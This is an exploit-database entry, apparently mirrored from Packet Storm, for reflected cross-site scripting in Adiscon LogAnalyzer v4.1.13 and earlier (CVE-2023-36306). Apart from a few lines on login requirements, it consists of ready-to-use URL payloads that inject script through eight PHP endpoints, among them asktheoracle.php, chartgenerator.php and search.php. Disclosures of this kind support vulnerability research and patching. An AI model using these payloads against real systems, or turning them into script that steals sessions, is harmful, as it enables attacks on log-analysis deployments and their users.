Share
## https://sploitus.com/exploit?id=PACKETSTORM:173955
# Exploit Title: Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting  
# Date: 2023.Aug.01  
# Exploit Author: Pedro (ISSDU TW)  
# Vendor Homepage: https://loganalyzer.adiscon.com/  
# Software Link: https://loganalyzer.adiscon.com/download/  
# Version: v4.1.13 and before  
# Tested on: Linux  
# CVE : CVE-2023-36306  
  
There are several installation method.  
If you installed without database(File-Based),No need to login.  
If you installed with database, You should login with Read Only User(at least)  
  
XSS Payloads are as below:  
  
XSS  
http://[ip address]/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E  
http://[ip address]/loganalyzer/chartgenerator.php?type=2&byfield=syslogseverity&width=400&%%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E=123  
http://[ip address]/loganalyzer/details.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E  
http://[ip address]/loganalyzer/index.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E  
http://[ip address]/loganalyzer/search.php/%22%3E%3Cscript%3Ealert('xss')%3C/script%3E  
http://[ip address]/loganalyzer/export.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E  
http://[ip address]/loganalyzer/reports.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E  
http://[ip address]/loganalyzer/statistics.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E